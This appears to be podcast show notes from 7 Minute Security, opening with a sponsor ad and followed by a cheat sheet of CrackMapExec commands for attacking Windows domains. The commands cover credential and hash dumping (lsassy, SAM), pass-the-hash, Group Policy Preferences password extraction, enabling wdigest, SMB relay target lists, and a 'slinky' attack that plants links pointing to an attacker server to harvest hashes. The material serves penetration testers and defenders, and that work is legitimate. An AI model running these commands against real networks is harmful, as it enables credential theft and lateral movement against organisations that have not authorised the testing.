SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:
# General enumeration to see if your account works, and where:
cme smb x.x.x.x -u username -p pass
# Check if print services are enabled:
cme smb x.x.x.x -u username -p pass -M spooler
# Check for the nopac vuln:
cme smb x.x.x.x -u username -p pass -M nopac
# Find Group Policy Preferences (GPP) passwords:
cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password
# Get list of targets that do not require SMB signing:
cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt
# Set wdigest flag:
cme smb x.x.x.x -u username -p pass -M wdigest -o ACTION=enable
# Dump creds/hashes:
cme smb x.x.x.x -u username -p pass -M lsassy
# Do pass-the-hash attacks:
cme smb x.x.x.x -u username -H HASH
# Dump SAM database:
cme smb x.x.x.x -u username -p pass --sam
# Enumerate SMB shares:
cme smb x.x.x.x -u username -p pass --shares
# Conduct slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7
# Cleanup from slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 CLEANUP=TRUE